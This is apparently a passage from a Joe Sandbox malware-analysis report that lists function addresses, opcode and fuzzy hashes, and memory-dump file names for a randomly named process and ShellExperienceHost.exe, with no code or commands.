Snapshot File: hcaresult_30_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80131d674b39b414087bf18a07c1cbd0e07b439adb425c73da5d7cb65807312c
Instruction ID: 7fe769be7ce612fbc9e4b14f5747b5199b510fe7b0f51538a32acbd6187152b1
Opcode Fuzzy Hash: 80131d674b39b414087bf18a07c1cbd0e07b439adb425c73da5d7cb65807312c
Instruction Fuzzy Hash: 17F0903080E78A8FEB59AB6498591F9BBA0FF15341F4409BAD809C61D2EB3A9454C741

Function 00007FF848F2BD69 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2203147973.00007FF848F27000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f27000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 356f81abf16c398ebdbcfc6d8d1a2f0e21ddb7d9ead6c16ab3e766b4e6804422
Instruction ID: dff2429407fa83496587ee178696f5620ac0bb93699df8dcf1076687729e7b05
Opcode Fuzzy Hash: 356f81abf16c398ebdbcfc6d8d1a2f0e21ddb7d9ead6c16ab3e766b4e6804422
Instruction Fuzzy Hash: 37F07470D5851E8EEBA0EB68D8457BCBAB1FF48250F4085F6D40DE2292DF352E808F14

Function 00007FF848F317CC Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2203147973.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f31000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9bf94885647f19b52ad35f1622acb986e2324d4152d9ce218584efef1cffcdc
Instruction ID: 3c6e817c2ef5966830a74ba9f30b35c38f79fd4a98e46fde86fbbcc10ff1457d
Opcode Fuzzy Hash: f9bf94885647f19b52ad35f1622acb986e2324d4152d9ce218584efef1cffcdc
Instruction Fuzzy Hash: 55F03935E0D2298FCB98DF24D8A46FDB7A5EF81350F1040BAE10E97291CB345A98CB45

Function 00007FF848F3580B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2203147973.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f31000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64356afcbc56c5c2a35aeabdf2c62be433808b8bb3e9fe0d53dbd8cdbb388b15
Instruction ID: 2136050db3919020bc1d6ac3616d26aad7283bccae50933afec241952bd0793f
Opcode Fuzzy Hash: 64356afcbc56c5c2a35aeabdf2c62be433808b8bb3e9fe0d53dbd8cdbb388b15
Instruction Fuzzy Hash: B0D0C971C19B5A9FE744EB5884996A9BBE1FB98748B10016AD019D3285DF35D4014B40

Non-executed Functions

Function 00007FF848F2387E Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

.r]I, xrefs: 00007FF848F23954
0r]I, xrefs: 00007FF848F23944
8r], xrefs: 00007FF848F238D4
/r]I, xrefs: 00007FF848F23924

Memory Dump Source

Source File: 0000001E.00000002.2203147973.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f20000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: .r]I$/r]I$0r]I$8r]
API String ID: 0-2183019408
Opcode ID: 7c53a0c056baab7315f7268ca88e09f069fb055ec43689d260af0887d8a8df0f
Instruction ID: d09f6f969d9a89552f6bc7511fd93c881fab87e2f0ca9e836627bf40db2a1084
Opcode Fuzzy Hash: 7c53a0c056baab7315f7268ca88e09f069fb055ec43689d260af0887d8a8df0f
Instruction Fuzzy Hash: 9731AFA281F6D25FE31757782C249617FA1EF63A5071941FFD184CB0EBD509990AC3A3

Function 00007FF848F31609 Relevance: 5.1, Strings: 4, Instructions: 84COMMON

Download Yara Rule

Strings

!, xrefs: 00007FF848F3164D
-, xrefs: 00007FF848F31CAD
/, xrefs: 00007FF848F314A9
#, xrefs: 00007FF848F31C66

Memory Dump Source

Source File: 0000001E.00000002.2203147973.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f31000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: !$#$-$/
API String ID: 0-2869350023
Opcode ID: cbd41875ae0386d071deee34432befa8be8c1e964df479142f0819ca2bce6ed3
Instruction ID: 326312ea7cc4fbc5ee6d111932f568146fe5a8dee8a3d65324a85c63ac60e500
Opcode Fuzzy Hash: cbd41875ae0386d071deee34432befa8be8c1e964df479142f0819ca2bce6ed3
Instruction Fuzzy Hash: 0C31C570D0961D8FEBA8EF14C8A47E8B7B1FB59345F2001AAD40DE7291CB345A80CF44

Function 00007FF848F2F3C5 Relevance: 5.0, Strings: 4, Instructions: 43COMMON

Download Yara Rule

Strings

\, xrefs: 00007FF848F2F255
2, xrefs: 00007FF848F2F438
!, xrefs: 00007FF848F2F3CF
,, xrefs: 00007FF848F2F262

Memory Dump Source

Source File: 0000001E.00000002.2203147973.00007FF848F2F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ff848f2f000_mnUYCZffXdEgQlZPiczLektp.jbxd

Similarity

API ID:
String ID: !$,$2$\
API String ID: 0-4146109853
Opcode ID: 1bd80ee5ca1280fe01888d38f4608e87c9eb1654b37a45766555345fc6e90787
Instruction ID: f10ad6368f45b5d9ef3c8dfee6bb48509368ada6c81b4e787252a8d814b11e88
Opcode Fuzzy Hash: 1bd80ee5ca1280fe01888d38f4608e87c9eb1654b37a45766555345fc6e90787
Instruction Fuzzy Hash: 4E111C70D0862A8FEB64EF54E8847EEB7B2EF94341F2081A9D40D622C5CB395981CF55

Analysis Process: ShellExperienceHost.exePID: 7484, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F43565 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6ed7bfde50931d1f94699b183f6fd5cbac4c6ced82b59a2627d587cf4b270e
Instruction ID: 38acd35901bc192bd89b7eeda4f28fa14caab2496200ab0cdf5d4a93fd074591
Opcode Fuzzy Hash: ff6ed7bfde50931d1f94699b183f6fd5cbac4c6ced82b59a2627d587cf4b270e
Instruction Fuzzy Hash: 3991BE31D1D94E8EEB88EB2CD8587A9BBE1FF99754F50027AD009D32C6DF6828058B05

Function 00007FF848F51440 Relevance: 2.6, Strings: 2, Instructions: 51COMMON

Download Yara Rule

Strings

., xrefs: 00007FF848F5145A
/, xrefs: 00007FF848F514A9

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f51000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: .$/
API String ID: 0-2544594439
Opcode ID: eca88fed00705f82145441411eacd4f92ed679876abe23392c32a60bdf459424
Instruction ID: db4ea9fe5c6ae4a7328113625d969e939245ef50f8cd564630c29118555b1f64
Opcode Fuzzy Hash: eca88fed00705f82145441411eacd4f92ed679876abe23392c32a60bdf459424
Instruction Fuzzy Hash: 63115A35E09319CFDB25DB54D8547EDB3B1EF41354F2042AAD00D9B292DB786A98CB44

Function 00007FF848F405A0 Relevance: 1.6, Strings: 1, Instructions: 308COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: fb3829ab93ff200b3341d9649bfbe3a708fac93e3039c9ce7c1dec7bab0fe97d
Instruction ID: b5583a983c0cda1d86ca8827f946911e92efa36a9e26924eb03f809fcb6a44ee
Opcode Fuzzy Hash: fb3829ab93ff200b3341d9649bfbe3a708fac93e3039c9ce7c1dec7bab0fe97d
Instruction Fuzzy Hash: 92912A23D1E9D24EE291777C78161F53FA0FFA2AA4F1841B7D4888A0D7DE1C5806869A

Function 00007FF848F40638 Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 9536a21feb4a80b1a71c72e7d841242284b80e40af16cb0f89ac88bb990b8928
Instruction ID: 4c4a4d8d59e318433d3375d6b294b7ea222b76ded465cf39bf5a4a43735f5878
Opcode Fuzzy Hash: 9536a21feb4a80b1a71c72e7d841242284b80e40af16cb0f89ac88bb990b8928
Instruction Fuzzy Hash: 7D812B23D1E9D24EE391777C78161F53BA0FFA2BA4F1841B7D4488A0D7DD2C5806879A

Function 00007FF848F40615 Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: d4cb2dee8d4e0d0fd3eefe7229c6b438801a42d8e5f1660ff40cdec0f642f104
Instruction ID: 29908d658b19347e109c95c1579d3651f98859e6c77f403468c1fa68f6472575
Opcode Fuzzy Hash: d4cb2dee8d4e0d0fd3eefe7229c6b438801a42d8e5f1660ff40cdec0f642f104
Instruction Fuzzy Hash: 92812B23D1E9D24EF291777C78161F53FA0FFA2AA4F1841B7D4884A0D7DE1C5806869A

Function 00007FF848F405ED Relevance: 1.5, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: d47612e8c482c249a9b7d16053e715580eff86d7237dec4c8d6afa2502519ab2
Instruction ID: ee0cf53eec275d35fe0922ed8f90d6d226b7b9d41ff1e72465595db0227bc168
Opcode Fuzzy Hash: d47612e8c482c249a9b7d16053e715580eff86d7237dec4c8d6afa2502519ab2
Instruction Fuzzy Hash: 2F813B23D0E9D25FE391777C78161F53FA0FFA2AA4F1841B7D4884A0D7DA1C580A879A

Function 00007FF848F40640 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 309af8f5a1d8079f6ff78638156373128728fdad71f3531e5207a7f6f8b492a6
Instruction ID: bc87ae6c63f1a7c006e77fdb388b7767fca26f9ddd4cb4975c8c8c69effaa699
Opcode Fuzzy Hash: 309af8f5a1d8079f6ff78638156373128728fdad71f3531e5207a7f6f8b492a6
Instruction Fuzzy Hash: ED712923D1E9D24EE39577BC78161F53FA0FFA2AA4F1841B7D4884A0D7DE1C5806878A

Function 00007FF848F40805 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

_, xrefs: 00007FF848F40839

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 142cdc991c963ea577dff0eca5852f1a6ef0cbbf35646f87ef5e7c6c3e35aa7f
Instruction ID: 84b5e925b682af095ee7caea9f5aef93b4594eef67d51fd2b9cae7fd4f346502
Opcode Fuzzy Hash: 142cdc991c963ea577dff0eca5852f1a6ef0cbbf35646f87ef5e7c6c3e35aa7f
Instruction Fuzzy Hash: 6421497290E5869FE784777CA8592EA7BD0FF61798F080077D448D90C3EE18905AC295

Function 00007FF848F40A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F40A70

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: c6211c3d76a4dd0485ad98bc5b884a4316d6d89470ca3c9cdb90e5bd301d6488
Instruction ID: 53c5db29aedf4a12e1d4277c773467c13933ac7e6ac49978da2a4b71e87007c9
Opcode Fuzzy Hash: c6211c3d76a4dd0485ad98bc5b884a4316d6d89470ca3c9cdb90e5bd301d6488
Instruction Fuzzy Hash: 61115B31D1854E9EE780FB68C8491B97BE0FFA8780F4005B6D818E6192EF78A5448740

Function 00007FF848F4123D Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F412AD

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: d334e98450ff48608cf596e992db7cf2e1b6dea759fda673967429ade7248754
Instruction ID: ab1b615171bece987b1b2e0c7604849aa3c2d56d108e76c1cb5727c88d4951a0
Opcode Fuzzy Hash: d334e98450ff48608cf596e992db7cf2e1b6dea759fda673967429ade7248754
Instruction Fuzzy Hash: E211EF30D0C96E8EEB98EB6884592B97BE0FF6A741F0405BBC00AE20D1EF286580C310

Function 00007FF848F41250 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F412AD

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 9be17de78e2d5795edbe57233e2d5699361fc12fa1c578418771504218fa0734
Instruction ID: 9f124fc05b21424519a336603ee1552b8b6accad06afc23690c2bf647002bf0b
Opcode Fuzzy Hash: 9be17de78e2d5795edbe57233e2d5699361fc12fa1c578418771504218fa0734
Instruction Fuzzy Hash: 51F0FF30E1D96F8EEB98BB6898083BA77E4FF66790F00053BD41DE20C0FF2816848214

Function 00007FF848F4FD2D Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F4FD4B

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F4F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f4f000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: abfaca1340e5fa52885e9b5c6a494372cc09fb373e3e002210ee3d8dff2d3142
Instruction ID: ca7aa83829d0cdd42842c159d52ffb443ab35c85d72d3ab5cf18831ff4570f3e
Opcode Fuzzy Hash: abfaca1340e5fa52885e9b5c6a494372cc09fb373e3e002210ee3d8dff2d3142
Instruction Fuzzy Hash: 69D09E70D0851D8FDBA4EF08C8447B876B1EB14340F0000BA910DF3281CF3429C08F04

Function 00007FF848F416D8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb28507b292c8f818e0f7c55b9f23207dedb87ef965744f7937aad2058530635
Instruction ID: ac4e20c1aee4f29f91936619c2766eabcbba5fc3770f9c5000adf3024d2d294a
Opcode Fuzzy Hash: cb28507b292c8f818e0f7c55b9f23207dedb87ef965744f7937aad2058530635
Instruction Fuzzy Hash: D781BD31A0CA5A8FDB98EB1898555B977E2FFA8B50F14017AD44ED32C6CF34AC428785

Function 00007FF848F4C5A9 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c46840ae45136ab188ed27a41b3fa97bc7827471a3ee1287ac23c04413e420f8
Instruction ID: d090247b1487424c40ff7250a25695b3b9d8290c48a2105b84a68924b3f5bb47
Opcode Fuzzy Hash: c46840ae45136ab188ed27a41b3fa97bc7827471a3ee1287ac23c04413e420f8
Instruction Fuzzy Hash: 03612770D0C51E8FEB94EBA884546FDB7B1EF69740F50527AC00DE7282EF3869408B54

Function 00007FF848F41D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b93123faf7a77113f1d384a9226fd5ba3d0daa53675f40b37df843fd2120bff5
Instruction ID: 1486a6535bc5069f995400764687ef68395b187c0d24e6a2bfa3aabea9ab8aaa
Opcode Fuzzy Hash: b93123faf7a77113f1d384a9226fd5ba3d0daa53675f40b37df843fd2120bff5
Instruction Fuzzy Hash: FE51CF31A0CA9A8FDB48EF1888545BA77E2FFA8740F14457ED44AD7282DF35E842C785

Function 00007FF848F43165 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee45c3743d7c324c3acb9a179c2558674cab192c0df7b373f30b1ac796f68869
Instruction ID: dec531f22b97cb1bb2106b798547af1b5c2bdf3978d008f62db2b463544ef562
Opcode Fuzzy Hash: ee45c3743d7c324c3acb9a179c2558674cab192c0df7b373f30b1ac796f68869
Instruction Fuzzy Hash: 6A513430D0851D8EEB54EBA8C459AFDBBF1EF68741F40007AD00AE72D2DB3869458B54

Function 00007FF848F42145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ad9cf813bf72c312baf0aaf16e7b843c3866c72a4bb2c9db83a0c017206e5a
Instruction ID: 4c0104d89943f456a39ccece161b2f981a1c363c96c04919b1106740b528fafc
Opcode Fuzzy Hash: 45ad9cf813bf72c312baf0aaf16e7b843c3866c72a4bb2c9db83a0c017206e5a
Instruction Fuzzy Hash: 84414831E1DA4A4FE346EB7898491B8BBE0EFA6790F0501BBD00DD71D2DF28A9418365

Function 00007FF848F4B33D Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d7a542bca8fc63e43efd5e6918aa8c42ff922321bdd024b4d146b0c50cd05c9
Instruction ID: 2443fb029d8077ac533edba7514b37791c9de944ae3e9fe11a77ba90bfd1bde8
Opcode Fuzzy Hash: 0d7a542bca8fc63e43efd5e6918aa8c42ff922321bdd024b4d146b0c50cd05c9
Instruction Fuzzy Hash: 5C41BC71E2C94A9EF741FBA898492B977E0FF69751F0448B7D409E61D3EF28A4418314

Function 00007FF848F57A45 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98305ea1b042eeaa085539bb9211c818f85f2b902aefcb5080fa522ad19b9eb8
Instruction ID: 903e2e6f7d8710201831438f2fbee0da726621f5f4bb8651f5c89fc51795136c
Opcode Fuzzy Hash: 98305ea1b042eeaa085539bb9211c818f85f2b902aefcb5080fa522ad19b9eb8
Instruction Fuzzy Hash: F9412670D0861A8FEB54EFA4D4987ECBBF0EF59351F14017AD009E62D2DB78A984CB19

Function 00007FF848F4C69D Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f701bff98885d3fee12b6ea95812567116a19e4f177f86607bfc13610ca0361e
Instruction ID: 9f036fc9d22dc1e9cf81a26d3dc7f231b701c6e0d6670f971668b97de7077037
Opcode Fuzzy Hash: f701bff98885d3fee12b6ea95812567116a19e4f177f86607bfc13610ca0361e
Instruction Fuzzy Hash: 9F31A234E1C91D8FEB94FBA898556ADB7B1FF69740F60117AD00DE7282EF3468418B44

Function 00007FF848F4CDFB Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0959bd0cfca7961b05b50707688995076d31ce05c0df4410b9103736179b4fd8
Instruction ID: cbe2878c1c79efe515c04057a6327a40be3e7749448ed22fc09c689a2e9e5ce0
Opcode Fuzzy Hash: 0959bd0cfca7961b05b50707688995076d31ce05c0df4410b9103736179b4fd8
Instruction Fuzzy Hash: D531AE32D1E65A9EEB9277A8A4051FD77A0FF61BA9F041377D54CD90D2EF3C244082A8

Function 00007FF848F4CD68 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebbb17dbc036b84ac98cccedecb56bea2add321bddc97538087a0949f3bc0efe
Instruction ID: 6dd99c8bd1c2cab37827f2417b9db7f141ad1e114904c3d74062dc5c2533a795
Opcode Fuzzy Hash: ebbb17dbc036b84ac98cccedecb56bea2add321bddc97538087a0949f3bc0efe
Instruction Fuzzy Hash: 3421D83761D926AAD754B76CB8404EA7760FF947F5B001337D609D60C2EB25780986E4

Function 00007FF848F43294 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acedf24f5f9d7b0b14b5be42ded029a97870296c46dd1957fd8b5e98226b3fed
Instruction ID: 7455daa86355e5b87d11d6fbb6fd342c1c1472ab006ecd0aa224455253abadc5
Opcode Fuzzy Hash: acedf24f5f9d7b0b14b5be42ded029a97870296c46dd1957fd8b5e98226b3fed
Instruction Fuzzy Hash: 9D21CE70D0891D8FEB94EF98C894AECBBF1FBA8751F10407AD00AE7295DB786940CB54

Function 00007FF848F4A9B1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f47000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82d8582ccd61be6293b10b4ed66af97cb604f94946dc5e8dfb0e0fc4e5ee30b
Instruction ID: 1f7dbb75e595117b634a0bf67817a2986c680923337d0a3fa18f92dadd185e50
Opcode Fuzzy Hash: a82d8582ccd61be6293b10b4ed66af97cb604f94946dc5e8dfb0e0fc4e5ee30b
Instruction Fuzzy Hash: D1215E7091864DCFDB85EF18C459AAD7BF0FF6D345F0505AAE80AD7291DB34A890CB80

Function 00007FF848F43354 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f40000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae883888b9af3c845c6c2cc76f4a65f3c003f0f8f15ce91ce903598d9b44d1c8
Instruction ID: 5a37adbfa54cf492360ea8c8542aa667f47725eeb828cf6deffbc306b0898b6e
Opcode Fuzzy Hash: ae883888b9af3c845c6c2cc76f4a65f3c003f0f8f15ce91ce903598d9b44d1c8
Instruction Fuzzy Hash: 7A21C03184D78A8FE742EB7888589A97FF0EF5B300F0904EBD048C70A3DA28954AC751

Function 00007FF848F57121 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f54000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64086fca50710cd0645f207b1b82c3e63d6e4467cd2a89b8694f9232b62994b
Instruction ID: a7e46632523d02a572e4df082925d72901fe038c71b018f1f0eeccfd1e65c8e2
Opcode Fuzzy Hash: d64086fca50710cd0645f207b1b82c3e63d6e4467cd2a89b8694f9232b62994b
Instruction Fuzzy Hash: B4117F30D0CA4E9FEB98EF2884592BABBA0FF68341F0005BAD409C25D2DF39A544CB45

Function 00007FF848F52AE8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2205539726.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ff848f51000_ShellExperienceHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64ddb76b9477e21b53d61015af9ca79d9308a82e8e633cdfa917a46b986d4eb4
Instruction ID: 5ee8da3d75263650687777882682b9cf5cde4b206868605014c8b02a6790b278
Opcode Fuzzy Hash: 64ddb76b9477e21b53d61015af9ca79d9308a82e8e633cdfa917a46b986d4eb4
